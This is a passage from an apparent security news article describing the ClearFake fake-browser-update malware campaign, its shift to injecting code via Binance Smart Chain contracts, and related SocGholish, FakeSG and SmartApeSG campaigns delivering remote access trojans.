- As part of the tactic, the web traffic is first redirected to the Keitaro TDS filtering service before being lured into fake browser update pages.
- The fake update pages look realistic and copy the download pages for Chrome, Edge, and Microsoft.
- Once the victim clicks on the update button, it downloads the payloads hosted on Dropbox and OneDrive.
It is to be noted that SocGholish operators had successfully leveraged this technique in 2022, which indicates that the same threat group is likely behind the new ClearFake malware.
Change in code injection method
In late September, ClearFake changed its code injection tactics. Previously, the injected code was base64 encoded script added to the HTML of the compromised webpages and most recently it has been observed relying on smart contracts from Binance Smart Chain.
A glance at fake browser updates landscape
- Another attack campaign is associated with the SocGholish malware that has been used for over five years to deliver AsyncRAT and NetSupport, among others.
- Furthermore, a FakeSG campaign was used to NetSupport RAT onto the victims’ systems.
- One more cluster of fake update campaigns was observed in June, with the emergence of SmartApeSG that downloaded NetSupport RAT on compromised systems.
The bottom line
As fake browser updates remain a viable method for malware delivery, organizations need to actively monitor their endpoints and networks to block such threats. Furthermore, the IOCs associated with the threat have been made available to understand attackers’ infrastructure, attack pattern, and their activities.